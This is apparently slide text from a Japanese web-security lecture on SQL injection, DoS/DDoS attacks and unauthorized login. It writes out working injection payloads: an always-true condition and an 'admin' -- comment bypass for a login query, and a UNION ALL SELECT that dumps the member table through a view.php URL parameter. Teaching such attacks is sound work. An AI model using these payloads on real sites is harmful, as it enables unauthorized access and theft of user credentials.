3. SQL INJECTION
このクエリのWHERE節をいつもTrueにさせる方法は?
SELECT * FROM member WHERE id = ‘$user_id’ AND password = ‘$user_pass’
これはどう?
SELECT * FROM member WHERE id = ‘user’ AND pass = ‘’ OR ‘’ = ‘’
SELECT * FROM member WHERE id = ‘admin’ --’ AND pass = ‘dummy’
このようにSQLクエリの一部を試す方法をSQL Injection攻撃という
4. DOS攻撃
DoS Attack : Denial of Service Attack = サービス拒否攻撃
もし、掲示板が見られなくなったら?
もし、サーバへのアクセスができなくなったら?
もっとひどい攻撃としてDDoS攻撃がある
Distributed Denial of Service Attack
8. 不正ログイン
さっきのやつコピーペー
SELECT * FROM member WHERE id = ‘$user_id’ AND password = ‘$user_pass’
を
SELECT * FROM member WHERE id = ‘user’ AND pass = ‘’ OR ‘’ = ‘’
もしくは
SELECT * FROM member WHERE id = ‘admin’ --’ AND pass = ‘dummy’
に
12. 会員情報を取得
SQLのUNION節を用いる
SELECT * FROM board WHERE id = $post_id
SELECT * FROM board WHERE id = 0 UNION ALL SELECT *, ‘’, ‘’, ‘’, ‘’, ‘’ from member
http://yourserver/view.php?post_id=1 UNION ALL SELECT *, '', '', '', '', '' from
member LIMIT 0, 1